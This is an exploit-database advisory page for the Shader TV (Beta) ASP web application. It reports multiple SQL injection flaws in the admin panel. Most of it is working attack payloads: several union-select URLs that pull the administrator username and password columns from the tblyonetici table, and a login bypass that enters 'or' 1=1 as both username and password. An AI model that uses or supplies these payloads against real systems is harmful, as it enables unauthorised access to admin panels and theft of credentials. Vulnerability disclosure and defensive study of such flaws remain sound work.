Lucene search
Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities
Shader TV (Beta) Remote SQL Injection Vulnerabilities exposer on Administrator Pane
Show more
==============================================================
Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities
==============================================================
Shader TV (Beta) Multiple Remote SQL Injection Vulnerable
Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html
Coded : Asp
Lnguae : Acces
Discovered By U238 | < Ugurcan Engin >
Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz :
Web - Designer Solution Developer
0x1 = [S** Says : Allah Belan? Versin Ulan Siz0 !]
0x2 = [Ben Sadece Iyi Bir Insan Olmak Istemistim ]
Exploit:
Administrator Login to creative web panel is atack of to SQL injectin.
http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici
----
http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,parola+from+tblyonetici&sayfa=1
http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,kullanici+from+tblyonetici&sayfa=1
----
http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,parola+from+tblyonetici
http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,kullanici+from+tblyonetici
Administrator Panel :
target/ShaderTV/yonet
-------------------------------
Admin Panel Login Bypass :
target/ShaderTV/yonet/default.asp
username : 'or' 1=1
password : 'or' 1=1
This is Admin Panel See You ?
---------------------------------
# 0day.today [2018-01-04] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo08 May 2008 00:00Current
7.1High risk
Vulners AI Score7.1